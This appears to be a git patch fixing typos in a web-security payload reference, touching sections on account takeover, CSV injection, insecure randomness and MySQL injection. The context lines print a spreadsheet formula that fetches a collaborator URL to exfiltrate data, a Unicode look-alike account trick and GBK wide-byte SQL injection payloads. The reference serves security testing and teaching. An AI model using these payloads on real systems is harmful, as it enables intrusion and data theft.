From 01a6299b08eb5971c20f49e2325310c77715129a Mon Sep 17 00:00:00 2001 From: clemensGooooo <100614200+clemensGooooo@users.noreply.github.com> Date: Tue, 29 Jul 2025 15:34:52 +0200 Subject: [PATCH] Fix several typos --- Account Takeover/README.md | 6 +++--- CSV Injection/README.md | 4 ++-- Insecure Randomness/README.md | 2 +- SQL Injection/MySQL Injection.md | 4 ++-- 4 files changed, 8 insertions(+), 8 deletions(-) diff --git a/Account Takeover/README.md b/Account Takeover/README.md index 14d26e3b..0aa42204 100644 --- a/Account Takeover/README.md +++ b/Account Takeover/README.md @@ -13,7 +13,7 @@ * [Leaking Password Reset Token](#leaking-password-reset-token) * [Password Reset via Username Collision](#password-reset-via-username-collision) * [Account Takeover Due To Unicode Normalization Issue](#account-takeover-due-to-unicode-normalization-issue) -* [Account Takeover via Web Vulneralities](#account-takeover-via-web-vulneralities) +* [Account Takeover via Web Vulnerabilities](#account-takeover-via-web-vulnerabilities) * [Account Takeover via Cross Site Scripting](#account-takeover-via-cross-site-scripting) * [Account Takeover via HTTP Request Smuggling](#account-takeover-via-http-request-smuggling) * [Account Takeover via CSRF](#account-takeover-via-csrf) @@ -110,7 +110,7 @@ See: [CVE-2020-7245](https://nvd.nist.gov/vuln/detail/CVE-2020-7245) ### Account Takeover Due To Unicode Normalization Issue -When processing user input involving unicode for case mapping or normalisation, unexcepted behavior can occur. +When processing user input involving unicode for case mapping or normalisation, unexpected behavior can occur. * Victim account: `demo@gmail.com` * Attacker account: `demⓞ@gmail.com` @@ -119,7 +119,7 @@ When processing user input involving unicode for case mapping or normalisation, [Unicode pentester cheatsheet](https://gosecure.github.io/unicode-pentester-cheatsheet/) can be used to find list of suitable unicode characters based on platform. -## Account Takeover via Web Vulneralities +## Account Takeover via Web Vulnerabilities ### Account Takeover via Cross Site Scripting diff --git a/CSV Injection/README.md b/CSV Injection/README.md index 3c65ca6a..047cb2d0 100644 --- a/CSV Injection/README.md +++ b/CSV Injection/README.md @@ -65,7 +65,7 @@ Technical details of the above payloads: ### Google Sheets -Google Sheets allows some additionnal formulas that are able to fetch remote URLs: +Google Sheets allows some additional formulas that are able to fetch remote URLs: * [IMPORTXML](https://support.google.com/docs/answer/3093342?hl=en)(url, xpath_query, locale) * [IMPORTRANGE](https://support.google.com/docs/answer/3093340)(spreadsheet_url, range_string) @@ -79,7 +79,7 @@ So one can test blind formula injection or a potential for data exfiltration wit =IMPORTXML("http://burp.collaborator.net/csv", "//a/@href") ``` -Note: an alert will warn the user a formula is trying to contact an external ressource and ask for authorization. +Note: an alert will warn the user a formula is trying to contact an external resource and ask for authorization. ## References diff --git a/Insecure Randomness/README.md b/Insecure Randomness/README.md index be9a00ed..1f9916ef 100644 --- a/Insecure Randomness/README.md +++ b/Insecure Randomness/README.md @@ -188,7 +188,7 @@ Creating your own randomness algorithm is generally not recommended. Below are s ### Tools -Generic identification and sandwitch attack: +Generic identification and sandwich attack: * [AethliosIK/reset-tolkien](https://github.com/AethliosIK/reset-tolkien) - Insecure time-based secret exploitation and Sandwich attack implementation Resources diff --git a/SQL Injection/MySQL Injection.md b/SQL Injection/MySQL Injection.md index d9d43b79..52f96360 100644 --- a/SQL Injection/MySQL Injection.md +++ b/SQL Injection/MySQL Injection.md @@ -718,7 +718,7 @@ Wide byte injection is a specific type of SQL injection attack that targets appl The `SET NAMES gbk` query can be exploited in a charset-based SQL injection attack. When the character set is set to GBK, certain multibyte characters can be used to bypass the escaping mechanism and inject malicious SQL code. -Several characters can be used to triger the injection. +Several characters can be used to trigger the injection. * `%bf%27`: This is a URL-encoded representation of the byte sequence `0xbf27`. In the GBK character set, `0xbf27` decodes to a valid multibyte character followed by a single quote ('). When MySQL encounters this sequence, it interprets it as a single valid GBK character followed by a single quote, effectively ending the string. * `%bf%5c`: Represents the byte sequence `0xbf5c`. In GBK, this decodes to a valid multi-byte character followed by a backslash (`\`). This can be used to escape the next character in the sequence. @@ -756,7 +756,7 @@ For instance, if the input is `?id=1'`, PHP will add a backslash, resulting in t However, when the sequence `%df` is introduced before the single quote, as in `?id=1%df'`, PHP still adds the backslash. This results in the SQL query: `SELECT * FROM users WHERE id='1%df\'' LIMIT 0,1`. -In the GBK character set, the sequence `%df%5c` translates to the character `連`. So, the SQL query becomes: `SELECT * FROM users WHERE id='1連'' LIMIT 0,1`. Here, the wide byte character `連` effectively "eating" the added escape charactr, allowing for SQL injection. +In the GBK character set, the sequence `%df%5c` translates to the character `連`. So, the SQL query becomes: `SELECT * FROM users WHERE id='1連'' LIMIT 0,1`. Here, the wide byte character `連` effectively "eating" the added escape character, allowing for SQL injection. Therefore, by using the payload `?id=1%df' and 1=1 --+`, after PHP adds the backslash, the SQL query transforms into: `SELECT * FROM users WHERE id='1連' and 1=1 --+' LIMIT 0,1`. This altered query can be successfully injected, bypassing the intended SQL logic.